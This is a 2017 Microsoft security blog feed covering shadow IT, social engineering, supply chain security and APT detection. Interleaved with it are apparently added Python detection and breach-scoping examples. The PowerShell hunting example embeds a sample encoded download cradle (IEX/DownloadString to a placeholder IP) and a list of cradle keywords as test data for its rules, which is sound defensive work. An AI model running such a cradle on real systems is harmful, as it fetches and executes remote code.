Microsoft Secure Blog: in-depth discussion of security, cybersecurity and technology trends affecting trust in computing, as well as timely security news, trends, and practical security guidance. Feed last updated 2017-04-24.

4 steps to managing shadow IT
Microsoft Secure Blog Staff, 2017-04-24

Shadow IT is on the rise. More than 80 percent of employees report using apps that weren’t sanctioned by IT. Shadow IT includes any unapproved hardware or software, but SaaS is the primary driver of its rapid rise. Today, attempting to block it is an outdated, ineffective approach: employees find ways around IT controls.

How can you empower your employees and still maintain visibility and protection? Here are four steps to help you manage SaaS apps and shadow IT.

Step 1: Find out what people are actually using

The first step is to get a detailed picture of how employees use the cloud. Which applications are they using? What data is uploaded and downloaded? Who are the top users? Is a particular app too risky? These insights provide information that can help you develop a strategy for cloud app use in your organization, as well as indicate whether an account has been compromised or a worker is taking unauthorized actions.

Step 2: Control data through granular policies

Once you have comprehensive visibility into the apps your organization uses, you can monitor users’ activities and implement custom policies tailored to your organization’s security needs, such as restricting certain data types or alerting on unexpectedly high rates of an activity. You can also take action on policy violations, for instance by converting a public sharing link to a private one or quarantining a user.

Step 3: Protect your data at the file level

Protecting data at the file level is especially important when data is accessed through unknown applications. Data loss prevention (DLP) policies can help ensure that employees don’t accidentally send sensitive information, such as personally identifiable information (PII), credit card numbers, and financial results, outside your corporate network. Today, there are solutions that make that easier.

Step 4: Use behavioral analytics to protect apps and data

Through machine learning and behavioral analytics, modern threat detection technologies analyze how each user interacts with SaaS applications and assess the risk of that behavior. This helps you identify anomalies that may indicate a breach, such as simultaneous logons from two countries, the sudden download of terabytes of data, or repeated failed logons that may signify a brute-force attack.
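The three anomalies named above, as an added example that is not from the original post: a small Python detector run over constructed SaaS audit events (the event fields, the one-hour travel window, the ten-failures-in-five-minutes threshold and the peer-median download baseline are all assumptions). It flags a second successful sign-in from a different country inside the window, a per-user download volume far above the peer median, and a burst of failed logons against a single account.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Constructed SaaS audit events; a CASB would pull these from the provider's
# activity API. Field names and values are assumptions for this example.
SAMPLE_EVENTS = [
    {"ts": "2017-04-24T08:00:00", "user": "alice", "action": "login_ok", "country": "US", "bytes": 0},
    {"ts": "2017-04-24T08:05:00", "user": "alice", "action": "download", "country": "US", "bytes": 50_000_000},
    {"ts": "2017-04-24T08:20:00", "user": "alice", "action": "login_ok", "country": "RU", "bytes": 0},
    {"ts": "2017-04-24T08:21:00", "user": "alice", "action": "download", "country": "RU", "bytes": 2_000_000_000_000},
    {"ts": "2017-04-24T09:30:00", "user": "carol", "action": "login_ok", "country": "DE", "bytes": 0},
    {"ts": "2017-04-24T09:31:00", "user": "carol", "action": "download", "country": "DE", "bytes": 10_000_000},
] + [
    # Twelve failed logons against bob's account, ten seconds apart.
    {"ts": f"2017-04-24T09:0{i // 6}:{(i % 6) * 10:02d}", "user": "bob",
     "action": "login_fail", "country": "US", "bytes": 0}
    for i in range(12)
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_impossible_travel(events, window=timedelta(hours=1)):
    """Two successful sign-ins by one user from different countries within `window`."""
    logins = defaultdict(list)
    for e in events:
        if e["action"] == "login_ok":
            logins[e["user"]].append(e)
    alerts = []
    for user, evs in logins.items():
        evs.sort(key=_ts)
        for prev, cur in zip(evs, evs[1:]):
            gap = _ts(cur) - _ts(prev)
            if prev["country"] != cur["country"] and gap <= window:
                alerts.append({"kind": "impossible_travel", "user": user,
                               "detail": f"{prev['country']} then {cur['country']} {gap} later"})
    return alerts


def detect_download_spike(events, factor=10, floor_bytes=1_000_000_000):
    """A user's download volume more than `factor` times the peer median.

    Every active user counts toward the median (zero if they downloaded
    nothing), and `floor_bytes` stops a quiet tenant alerting on kilobytes.
    """
    totals = {e["user"]: 0 for e in events}
    for e in events:
        if e["action"] == "download":
            totals[e["user"]] += e["bytes"]
    threshold = max(factor * median(totals.values()), floor_bytes)
    return [{"kind": "download_spike", "user": u,
             "detail": f"{b:,} bytes downloaded, threshold {threshold:,.0f}"}
            for u, b in totals.items() if b > threshold]


def detect_failed_logon_burst(events, threshold=10, window=timedelta(minutes=5)):
    """At least `threshold` failed logons for one account inside a sliding window."""
    fails = defaultdict(list)
    for e in events:
        if e["action"] == "login_fail":
            fails[e["user"]].append(_ts(e))
    alerts = []
    for user, times in fails.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"kind": "failed_logon_burst", "user": user,
                               "detail": f"{end - start + 1} failures within {window}"})
                break  # one alert per account is enough
    return alerts


def run_detections(events):
    alerts = (detect_impossible_travel(events) + detect_download_spike(events)
              + detect_failed_logon_burst(events))
    return sorted(alerts, key=lambda a: (a["user"], a["kind"]))


if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"{a['kind']:20} {a['user']:6} {a['detail']}")
```

Thresholds are where a detector like this lives or dies. The download rule compares against the tenant's own peer median rather than a fixed byte count, so a small tenant does not alert on routine traffic, and the failed-logon rule uses a sliding window, so a slow spray spread across an hour is not mistaken for a burst. A CASB does the same with far richer baselines (per-user history, device, ISP), but the shape of the logic is the same.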

Where can you start?

Consider a Cloud Access Security Broker (CASB). These solutions are designed to help you achieve each of these steps in a simple, manageable way. They provide deeper visibility, comprehensive controls, and improved protection for the cloud applications your employees use—sanctioned or unsanctioned.

To learn why CASBs are becoming a necessity, read our new e-book. It outlines the common issues surrounding shadow IT and how a CASB can be a helpful tool in your enterprise security strategy.

Read Bring Shadow IT into the Light.


Navigating cybersecurity in the New Age
Microsoft Secure Blog Staff, 2017-04-20

In today’s rapidly evolving tech landscape, tools, gadgets, and platforms aren’t the only things advancing. Cyberattacks are becoming more powerful, wide-ranging, and harmful to organizations around the globe.

For any enterprise, cybersecurity is one of the most essential factors in business success. As new technology emerges, leaders have to meet modern security needs with stronger, more intelligent solutions. Today, modern security officers must:

  • Recognize the intricacies of cyberspace and the cyberattacks that threaten it
  • Take advantage of machine learning and cloud platforms that enhance security
  • Gain insight into top trends and the future of the cybersecurity industry

Navigating today’s advanced cyber threats is a team effort. Organizations must learn new skills to protect themselves from cyber criminals and ensure infrastructure security. It takes a team of security experts, analysts, IT specialists, and risk assessors to restructure and refine cybersecurity.

On May 10th, Microsoft will live stream from the Security Summit, an invitation-only event for Chief Information Security Officers. Attend the live Virtual Security Summit to hear from leading security experts about best practices and solutions to keep your organization safe.

Don’t miss out on the opportunity to gain insights and learn how to protect your organization, detect, and respond to evolving cyberattacks.



Is social engineering the biggest threat to your organization?
Microsoft Secure Blog Staff, 2017-04-19

“Always remember: Amateurs hack systems. Professionals hack people.” –Bruce Schneier, CTO, Counterpane Internet Security, Inc.

All over the globe, social engineering is a dominant and growing threat to organizational security. Since January 2015, the number of social engineering victims identified by the FBI has increased 270%, costing businesses more than $2.3 billion.

Social engineering happens when an attacker uses manipulation, influence, or deception to get another person to release information or to perform an action that benefits the attacker. Essentially, it comes down to tricking people into breaking normal security procedures, such as divulging a password.

Some common types of social engineering include:

  • Spear phishing – sending an email that appears to be from someone you trust, such as the CEO or corporate IT, requesting that you take an action that exposes confidential information.
  • Dumpster diving – rummaging through the trash to try to find confidential information like design documents with IP information, marketing plans, employee performance plans, or even organizational charts and phone lists.
  • 10 degrees of separation – appearing to have a shared connection you trust to make you feel more secure about discussing confidential information.

No matter how strong your technical security is, your organization’s people are often the most vulnerable link in the chain. But, with thorough, thoughtful, and regular education, they can also be your biggest asset in your fight against social engineering.

To learn how to implement strong security policies and build a security-aware culture to help protect your organization from social engineering risks, check out the Insider’s Guide to Social Engineering.

Strategies to build your cybersecurity posture
Microsoft Secure Blog Staff, 2017-04-18

This post is authored by Michael Montoya, Executive Advisor, Enterprise Cybersecurity Group Asia Region.

“You clicked on an infected message…” In my prior life of managing an enterprise email environment, I started thousands of messages with that response to the victims of the infamous “love bug” email.

Looking back, this was a simple task compared to what we now face. Over the past 20 years, I have been on the front lines of the cybersecurity battlefield and have been fortunate to serve among some of the greatest professionals in our industry. During this time, I have witnessed the landscape shift from annoying hacker hobbyists to the advanced tactics of nation-states and well-funded organized cyber-criminals. The evolution of attacks is advancing at a record pace, and we are at full throttle inside a digital transformation; I don’t expect any slowing of the pace of innovation coming from threat actors. In fact, trends indicate the opposite. We have the rise of cyber-terrorists, improving anti-forensics approaches, and non-malware attacks using in-memory, PowerShell-based, and WMI-based techniques, to name a few.

“How do we stop these new threat actors?” is a common question I am asked. Unfortunately, the landscape is far too complex for a simple answer, and the more appropriate question is “How can we maximize the cost of an attack for the attackers, so that these threat actors leave us alone?” If your home is more difficult to rob than your neighbor’s, you become a much less attractive target. So how can we increase our security posture in a world where the “identity” is the new network edge, while that identity works in coffee shops, airports and Wi-Fi hotspots around the globe? If your security posture relies on a human firewall to determine whether a website or document is malicious, then you may be the most desirable house in the neighborhood for criminals.

In my years of leading operational teams and working among many of the greatest minds and enterprises, I have picked up keen insights that can improve security hygiene and increase the difficulty for any attacker. Before we dive in, state one truth loud and clear: “I am already breached”. This doesn’t necessarily translate to you being under a hostile attack, but the “assume breach” posture sets a very important tone, and unfortunately is likely to be your reality.

In Asia, we especially find enterprise security is commonly based on firewalls and legacy antivirus technologies. Given this reality, we find that an overwhelming, and I mean OVERWHELMING, majority of endpoints have evidence of malicious artifacts, i.e. they have already been breached.

According to a recent FireEye report, a majority of attacks in Asia go undetected for as many as 520 days, and 55% of the time they are detected by external entities, not by our firewalls and antivirus technologies! Our numbers in Asia are improving, as they are globally, but not fast enough.

Now that we have assumed breach, how can we increase the cost of an attack? Here are 5 essentials that I have witnessed make a difference:

  1. Hygiene matters. Remember our parents always saying, “wash your hands”? Turns out they were right! The same is true in technology. Here are the minimum operating guidelines, the operational security equivalent of washing your hands:
    • Know your environment, especially your high value assets
    • Patch and install maintenance updates, prioritize your high value assets
    • Use complex passwords and encryption
    • Implement hardened administration and networks
    • Maintain logging
  2. Endpoint modernization. Many of us have modernized in a siloed, bolted-on way: signature-based antivirus, some compliance-driven encryption that drives up our helpdesk calls, and, for a few, an endpoint detection and response (EDR) technology. Each of these likely requires its own agent, consuming critical resources and making our end users shout our names unkindly. The siloed approach also requires our operations teams to stitch the outputs together and inundate an already overworked Security Information and Event Management (SIEM) system. A modern endpoint fully integrates these functions and uses virtualization and container technologies for isolation. The essentials of modern endpoint protection are to:
    • Perform the basics of anti-virus
    • Protect a user’s identity and contain lateral movement
    • Contain ransomware encryption
    • Leverage an intelligence platform to detect indicators of attack and compromise
    • Capture critical information to replay a breach in motion for advanced forensics
  3. Email application protection. There is a common saying in the USA that “a bad day fishing is better than a good day at work”. Allow me to reword it: “a bad day of phishing is a great day at work”. According to the Verizon Data Breach Investigations Report, 77% of modern attacks start with an email, where it is too easy to find patient zero. I am surprised by enterprises that continue to run hygiene services for anti-spam and anti-virus but don’t employ sandboxing or URL-rewrite capabilities. Unless we want the human firewall to remain our last line of defense, email is a critical application to secure. Vital features are:
    • Anti-Spam/Anti-Virus
    • Sandbox detonation of attachments
    • URL re-write
  4. Intelligence platform. Today’s modern attacks are based on unknowns, which is why signature-based technologies like antivirus are not succeeding. Intelligence must be based on a vast data set that can model indicators of attack and indicators of compromise quickly, then deliver them through technology. Enterprises that have developed such a platform are at a distinct advantage in hunting for and detecting the unknown behaviors that may precede an attack.
  5. Cybersecurity response and operations. People remain a critical component of success. There is no ignoring the shortage of security professionals, and the demand continues to grow. According to Michael Brown, CEO of Symantec, “The demand for the (cybersecurity) workforce is expected to rise to 6 million (globally) by 2019.…” In a recent post, Ann Johnson, VP of the Enterprise Cybersecurity Group at Microsoft, championed an important best practice and case for change to help address this shortage. Ensuring that readiness, training and advanced operations are in place is critical. I am never surprised by the silence I often receive when I ask: “What is the first step in your cyberbreach response plan once you have detected a breach?” This needs to be a top priority for any CISO and CIO. Microsoft recently published a reference guide to address incident response. The response plan must include the technology team, executives, legal, marketing, finance, risk and other relevant business stakeholders, ideally organized under an Incident Command System (ICS) for crisis management; too many of these plans include only the technology teams. Next, enterprises must reduce alert noise and ensure that their detection efficacy feeds them the alerts that matter. Operations teams must move from reactive alert management to proactive hunting, sweeping endpoints and environments for malicious behavior and artifacts. The latest innovation in threats is the non-malware attack, in which threat actors use system processes such as WMI and PowerShell to fly beneath the radar; identifying these abnormalities with managed sweeps is a new and critical operational process. Additionally, operations teams must consistently run red team/blue team drills to refine their skills and identify potential weak points.
Enterprises that have adopted these tactics are at a distinct advantage.
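A sweep of the kind essential 5 describes, as an added example that is not from the original post: Python rules run over constructed process-creation records (Sysmon event 1 or Security 4688 style; the field names, host names and sample command lines are assumptions). It decodes a PowerShell -EncodedCommand payload, flags download cradles, flags processes spawned by WmiPrvSE.exe (the usual footprint of remote WMI execution) and flags an Office application spawning a shell, which is the email-to-execution chain essential 3 worries about.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed process-creation records in the shape of exported Sysmon event 1
# / Security 4688 entries. Field names, hosts and command lines are assumptions.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"host": "WS-017", "image": PS,
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS-022", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /c whoami /all > C:\Windows\Temp\o.txt"},
    {"host": "WS-031", "image": PS,  # benign scheduled script, must not fire
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\Backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Download-cradle vocabulary, matched against the raw and the decoded command line.
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|"
                       r"\biwr\b|\biex\b|invoke-expression|frombase64string")
# "-switch value" pairs; the lookahead leaves the value unconsumed so that
# "-nop -enc X" still yields (enc, X).
SWITCH_RE = re.compile(r"(?i)(?:^|\s)-([a-z]+)\s+(?=(\S+))")


def _basename(path):
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(command_line):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell accepts -ec and any unambiguous prefix of -EncodedCommand
    (-e, -en, -enc, ...); the payload is Base64 over UTF-16LE text.
    """
    for match in SWITCH_RE.finditer(command_line):
        switch, value = match.group(1).lower(), match.group(2)
        if switch != "ec" and not "encodedcommand".startswith(switch):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return "<undecodable payload>"
    return None


def hunt(events):
    """Apply the four rules to each record; return one finding per rule hit."""
    findings = []
    for event in events:
        host, cmd = event["host"], event["command_line"]
        image, parent = _basename(event["image"]), _basename(event["parent_image"])
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append({"host": host, "rule": "encoded_powershell", "evidence": decoded})
        if CRADLE_RE.search(cmd) or (decoded and CRADLE_RE.search(decoded)):
            findings.append({"host": host, "rule": "download_cradle", "evidence": decoded or cmd})
        if parent == "wmiprvse.exe":
            findings.append({"host": host, "rule": "wmi_spawned_process",
                             "evidence": f"{parent} -> {image}: {cmd}"})
        if parent in OFFICE_APPS and image in SHELLS:
            findings.append({"host": host, "rule": "office_spawned_shell",
                             "evidence": f"{parent} -> {image}"})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']}  {f['rule']:22}  {f['evidence']}")
```

The encoded-command handling is the part worth copying: because PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec), and the payload is Base64 of UTF-16LE text, the rule decodes it and runs the cradle patterns over the plaintext, where IEX and DownloadString are visible. The benign scheduled script on WS-031 produces no findings, which is the test a hunt rule must pass before it is run across a fleet.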

The positives of digital transformation far outweigh the risks of the changing threat landscape. We must all assume we have been breached and transform our people, technology and processes to decrease the time it takes to detect and remediate a compromise. Making an attack more expensive for a threat actor is the biggest deterrent, and the steps above significantly increase the attacker’s cost per compromise.

Michael Montoya is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor in the Asia Pacific Region in the Enterprise Cybersecurity Group at Microsoft. In this role, he regularly advises enterprise executives and governments on cybersecurity issues, and is a frequent featured speaker at IT conferences around the globe.

How to protect yourself from cloud attacks
Microsoft Secure Blog Staff, 2017-04-17

As organizations rapidly move to the cloud, safeguarding cloud resources against advanced cyber threats has become a top priority. Sophisticated attack vectors require a new approach to security. How can you use unique insights into a variety of threats to help defend against cloud attacks?

To learn more about how to keep your cloud secure—especially in this ever-present era of cybercrime—join our webinar, Take your cloud security to the next level: How to protect yourself from cloud attacks on April 18, 2017 at 10:00 AM PST. Register now.

This webinar will explore the threat landscape and the anatomy of common cloud attacks; how to detect, prevent and rapidly respond to attacks; and how to use insights and analytics to defend against threats. You will learn how Azure Security Center and Operations Management Suite can help you gain visibility and control, prevent and detect cyber-attacks, and use analytics to help prevent future attacks.

There will be live Q&A with some of Microsoft’s foremost security experts. You don’t want to miss out—reserve your webinar seat today.

Explore more about our unique approach to security at Microsoft Secure.

How Microsoft is securing the information and communication supply chain
Microsoft Secure Blog Staff, 2017-04-17

Scrutiny of supply chain security for critical infrastructure is on the rise. Governments around the globe are paying increasing attention to the issue, as reflected in recently developed and currently developing policies. That said, the same principled, risk-based approach applies to managing risk in the supply chains of critical infrastructure as to supply chains more generally. The most effective requirements in this space result from governing bodies drawing on expertise through an open, collaborative, and iterative process that engages a range of stakeholders. One example of this approach in action is the National Institute of Standards and Technology’s (NIST) “Framework for Improving Critical Infrastructure Cybersecurity.” Version 1.1 of the Framework, currently out for public comment, contains updates focused largely on supply chain security.

We recently heard from Microsoft leaders on the methods and policies for securing the information and communication technology (ICT) supply chain in our webinar “Supply chain security: A framework for managing risk”. In this post, we cover some of the excellent questions our customers asked and how we responded.

How frequently does Microsoft conduct ‘red team’ pen testing of its products before vs. after fielding?
There are several pen test events that are carried out against our products and services annually, some of which are tied to competitions and educational events. Some of these are open to the hacking community, but many are closed events to ensure product and services integrity and availability.

Supply chain logistics today has to have close to real-time access to personal information to deliver products & services to meet customer demands. What changes do you see coming to protect that information?
Cloud based information protection and the broad application of access controls in a consistent and automated way is the best and most realistic way forward. The General Data Protection Regulation (GDPR), which takes effect on May 25, 2018, will require significant changes by organizations all over the world – including Microsoft and our customers. The GDPR represents a paradigm shift in global privacy requirements governing how you respect and protect personal data – no matter where it is sent, processed, or stored. Fundamentally, the GDPR is about protecting and enabling individuals’ rights to privacy, and its goals align with Microsoft’s enduring commitment to a cloud you can trust.

With fraud and piracy increasing in sophistication & capability how will the industry stay ahead of the curve?
Microsoft has a Digital Crimes Unit, an international team of attorneys, investigators, data scientists, engineers, analysts, and business professionals working together to transform the fight against cybercrime. In the future, such efforts will benefit from the automated identification that machine learning can provide, allowing this work to be done at even greater scale.

If the customer requested it, do you have the ability to do external auditing on their behalf? Have you ever had that in a contract internally or with vendors (do you audit vendor security)?
We do not provide audit services to our customers for their consumption. We do perform onsite assessments for our critical suppliers.

Can the panel elaborate on the due diligence Microsoft does on their “fourth party” suppliers, or subcontractors of contractors?
For our suppliers, we ensure that the contracts are clear on our expectations and security requirements not only for them but the suppliers they use as well. Accountability is with the supplier Microsoft contracts with, and if they choose to use a subcontractor, that does not change.

How do I convince my organization to implement supply chain security?
Whether you are working for an organization that provides products or services to governments, enterprises, or consumers, the trust of the purchaser in your output is going to be critical to sales. A principled approach to supply chain risk management can help you establish and/or enhance that trust by demonstrating your commitment to the quality of what you are selling.

Any statistics on actual breaches relating to points of breach?
There are several good reports including Verizon’s annual Data Breach Investigations Report. This report for the most part identifies people as the weakest link with phishing and easy passwords as the first point of breach.

What are the primary components of Microsoft’s vetting process to ensure a reliable vendor? Is there a way that vendors can obtain these requirements beforehand? If so, does that increase or decrease Microsoft’s likelihood of incurring risk?
Vendor onboarding is subject to a mutually agreed upon set of directives for vetting and qualification. These are tailored to Microsoft needs and requirements, so they may vary for other organizations. It is a good practice to discuss these requirements with the vendor prior to onboarding.

If you would like to hear more about the methods and policies for securing the ICT supply chain, watch our webinar Supply Chain Security: A Framework for Managing Risk on-demand.

Learn more about Microsoft’s strategic approach to security at Microsoft Secure.


The two-pronged approach to detecting persistent adversaries
Microsoft Secure Blog Staff, 2017-04-13

Advanced persistent threats rely on two primary methods of persistence: compromised endpoints and compromised credentials. It is critical to use tools that detect both simultaneously; with only one or the other in place, you give adversaries more opportunities to remain on your network.

There are many attack vectors within these two categories, including zero-day exploits, exploitation of known vulnerabilities or weak defenses, social engineering, hand-crafted malware and implants, and harvesting of legitimate credentials. Many cybersecurity tools have incomplete detection controls for these attacks and very little capability to detect the use of harvested credentials. Microsoft has invested heavily in tools that address both problems.

Many initial attacks still arrive via e-mail attachment, so e-mail based protection tools are an important first line of defense. Office 365 Advanced Threat Protection helps you protect your mailboxes against new, sophisticated attacks in real time. By protecting against unsafe attachments and malicious links, it can keep e-mail borne attacks at bay.

But not all attacks arrive by e-mail. Windows Defender Advanced Threat Protection (Windows Defender ATP) enables enterprise customers to detect, investigate, and respond to advanced and zero-day attacks on their endpoints. It uses built-in behavioral sensors, machine learning and analytics to detect attacks that have made it past other defenses. Threat optics, deep OS security, and big data expertise provide Security Operations (SecOps) with correlated, actionable alerts. SecOps can investigate up to six months of historical data in a single timeline and use one-click response actions to contain an incident and remediate infected endpoints. Windows Defender ATP has sensors that trace file, registry, network, process, memory and kernel activity to help defenders understand what is happening on the endpoint.

To complement these endpoint detection capabilities, Microsoft Advanced Threat Analytics offers critical insight into suspicious and anomalous user behavior, detecting lateral movement, credential theft activity and indicators of known attacker techniques. This is typically the blind spot for network defenders and digital forensics and incident response teams. By collecting network traffic and events in an environment, and by combining machine learning with detection of known techniques, Advanced Threat Analytics turns the noise into relevant Suspicious Activities, simplifying the task for incident response teams. The earlier response teams detect the adversary, the better they can prevent the attacker from gaining persistent access to your network.

Incident response teams need to detect both abnormal activity directly on endpoints and the use of compromised credentials; neither alone is enough.

Let’s walk through a practical example.

In the diagram above, an incident response team sees that Windows Defender ATP detected a user-mode exploit (assuming the exploited application ran in user mode) and raised the first alert for this attack. When the attacker then attempts to access the domain controller using a forged Privilege Attribute Certificate (PAC), the attempt fails because the domain controllers have been patched for MS14-068. Advanced Threat Analytics detects the failed forged-PAC attempt, which is a sign that the adversary is active in your environment and attempting to escalate privileges.

Many responders would inspect only User-Workstation-B, because Advanced Threat Analytics identifies that asset as the “source computer” of the attack. To understand the full scope of the breach, however, they have to investigate every machine used by this user to find “patient zero” as well as the other affected endpoints. By following the “pivot wide” rule of digital forensics and incident response, and with the right tools in place, network defenders can quickly identify the connection from User-Workstation-A to User-Workstation-B and follow it back to the initial compromise.

Without detecting both advanced attacks on the endpoint and compromised credentials, a response and recovery effort would be inadequate. If you clean up only the targeted endpoints but do not reset the affected credentials, the adversary still has access to the environment. If you reset only the affected credentials, the adversary still has access to the environment, and will simply re-harvest the new credentials from the systems they control. In both cases the eviction fails and, worse, the security team will have reported to the corporate board that the threat was addressed and the environment secure.
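The scoping logic this scenario calls for, as an added example that is not code from the original post or from either product: given an endpoint alert, an identity alert and a set of logon events (all constructed here; the field names, the logon-type rule and every host and account name other than the two workstations named in the post are assumptions), it follows the compromised account's sessions in both directions to find every host the adversary could have touched, then adds any account whose credentials were cached on one of those hosts, and repeats until the scope stops growing. The output is the eviction set the paragraph above argues for: hosts to investigate, credentials to reset, hosts merely targeted, and the earliest-evidence host as patient zero.

```python
from collections import deque

# Windows logon types whose credentials are cached on the destination host
# (interactive, batch, service, RemoteInteractive/RDP, CachedInteractive) and
# can be harvested by whoever controls that host. Type 3 (network) leaves
# nothing reusable behind.
CREDENTIAL_CACHING_LOGON_TYPES = {2, 4, 5, 10, 11}

# Constructed alerts and logon events for the scenario; every name other than
# the two workstations from the post is an assumption.
ENDPOINT_ALERTS = [
    {"ts": "2017-04-13T10:02:00", "host": "User-Workstation-A", "account": "jdoe",
     "alert": "user-mode exploit in document viewer"},
]
IDENTITY_ALERTS = [
    {"ts": "2017-04-13T10:40:00", "source_computer": "User-Workstation-B", "account": "jdoe",
     "target": "DC01", "alert": "forged PAC rejected by patched DC"},
]
LOGONS = [
    {"ts": "2017-04-13T10:15:00", "account": "jdoe", "src": "User-Workstation-A",
     "dst": "User-Workstation-B", "logon_type": 10, "status": "success"},
    {"ts": "2017-04-13T10:20:00", "account": "helpdesk-admin", "src": "Admin-Jumpbox",
     "dst": "User-Workstation-B", "logon_type": 10, "status": "success"},
    {"ts": "2017-04-13T10:30:00", "account": "jdoe", "src": "User-Workstation-B",
     "dst": "FileServer-01", "logon_type": 3, "status": "success"},
    {"ts": "2017-04-13T10:40:00", "account": "jdoe", "src": "User-Workstation-B",
     "dst": "DC01", "logon_type": 3, "status": "failure"},
    {"ts": "2017-04-13T11:00:00", "account": "bsmith", "src": "User-Workstation-C",
     "dst": "FileServer-01", "logon_type": 3, "status": "success"},
]


def movement_path(logons, account, start, end):
    """Shortest chain of successful logons by `account` from `start` to `end`."""
    edges = {}
    for l in logons:
        if l["account"] == account and l["status"] == "success":
            edges.setdefault(l["src"], set()).add(l["dst"])
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == end:
            return path
        for nxt in edges.get(path[-1], ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def scope_breach(endpoint_alerts, identity_alerts, logons):
    """Pivot wide from the alerts to the full eviction set.

    Hosts: every machine a compromised account had a session on (either end).
    Accounts: every account whose credentials were cached on a scoped host.
    Repeat until neither set grows.
    """
    accounts = {a["account"] for a in endpoint_alerts + identity_alerts}
    hosts = ({a["host"] for a in endpoint_alerts}
             | {a["source_computer"] for a in identity_alerts})
    grown = True
    while grown:
        grown = False
        for l in logons:
            if l["status"] != "success":
                continue
            if l["account"] in accounts and not {l["src"], l["dst"]} <= hosts:
                hosts |= {l["src"], l["dst"]}
                grown = True
            if (l["dst"] in hosts and l["logon_type"] in CREDENTIAL_CACHING_LOGON_TYPES
                    and l["account"] not in accounts):
                accounts.add(l["account"])
                grown = True
    # Heuristic: patient zero is the scoped host with the earliest evidence.
    evidence = [(a["ts"], a["host"]) for a in endpoint_alerts]
    evidence += [(l["ts"], l["src"]) for l in logons
                 if l["status"] == "success" and l["account"] in accounts]
    targeted = {l["dst"] for l in logons
                if l["status"] == "failure" and l["account"] in accounts} - hosts
    return {
        "patient_zero": min(evidence)[1] if evidence else None,
        "hosts_to_investigate": sorted(hosts),
        "credentials_to_reset": sorted(accounts),
        "targeted_not_compromised": sorted(targeted),
    }


if __name__ == "__main__":
    for key, value in scope_breach(ENDPOINT_ALERTS, IDENTITY_ALERTS, LOGONS).items():
        print(f"{key:26} {value}")
    print("jdoe path:", movement_path(LOGONS, "jdoe", "User-Workstation-A", "User-Workstation-B"))
```

Two details carry the argument of the paragraph above. The helpdesk account lands on the reset list because it logged on interactively (type 10, RDP) to a compromised workstation, where its credentials were cached in LSASS for the taking (absent Credential Guard or Restricted Admin mode), and the jumpbox it came from joins the investigation list because a now-compromised account had a session from it; bsmith's network logon (type 3) to the file server exposes nothing reusable and is left alone. DC01 appears only as a target, because the forged PAC was rejected; its event logs still deserve a look, but it is not in the eviction scope.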

Combining the data and insights from Windows Defender ATP and Advanced Threat Analytics might indeed change your recovery strategy and drive a full investigation.

Using these two capabilities in concert can be game-changing for digital forensics and incident response teams: they can instantly search and explore six months of historical data across endpoints, visually investigate forensic evidence with deep analysis, and respond quickly to contain the attack and prevent recurrence.

The power of Microsoft’s unique capabilities is amplified through the Microsoft Intelligent Security Graph, the nexus of information on indicators of compromise, authentications, e-mails and more. Threats detected, blocked, and remediated by Windows Defender ATP, Advanced Threat Analytics, and other Microsoft products are added to the Intelligent Security Graph, so when a persistent threat is captured and remediated by one solution, the others can immediately start protecting against it.

As you evaluate your methods and tools for protecting against Advanced Persistent Threats, consider how you can move away from traditional detection tools that look at a single alert, axis, input or variable. Look for integrated tools, which can help the defender with increased speed and accuracy along with meta-event analysis.

Ask your questions and join the discussion with our team on the Microsoft Advanced Threat Analytics Tech Community site or the Windows Defender ATP team in the TechNet Forum. To learn more about Microsoft’s approach and vision for cybersecurity, visit the Microsoft Secure web site.

Are my IoT deployments secure?
Microsoft Secure Blog Staff, 2017-04-10

According to IDC, there will be 28.1 billion connected Internet of Things (IoT) devices by 2020. Considering the numerous benefits of IoT—connected assets, predictive analytics, real-time intelligence—this isn’t all that surprising. But what about the inherent risks? IoT-based infrastructure is a powerful intelligence tool, but, if not properly secured, it can open the door to cyberattacks. A recent example is the massive attack that knocked Twitter, Reddit, Spotify, and Airbnb offline in a single night: a DDoS against the DNS provider Dyn, launched from a botnet of compromised IoT devices. So, if you want to reap IoT benefits, how can you do it safely?

To learn more about how to keep your IoT deployment secure—especially in this ever-present era of cybercrime—join our webinar, Are my IoT deployments secure? on April 11, 2017 at 10:00 AM PST. Register now.

This webinar will explore the key vulnerabilities hackers exploit to breach your infrastructure, as well as arm you with tips for designing, developing, deploying, and operating an IoT infrastructure you can trust using Azure IoT. You’ll also have the opportunity to participate in a live Q&A with some of Microsoft’s foremost IoT and security experts.

You don’t want to miss out—reserve your webinar seat today.

Explore more about our unique approach to security at Microsoft Secure.

Get both sides of the shadow IT story
Microsoft Secure Blog Staff, 2017-04-10

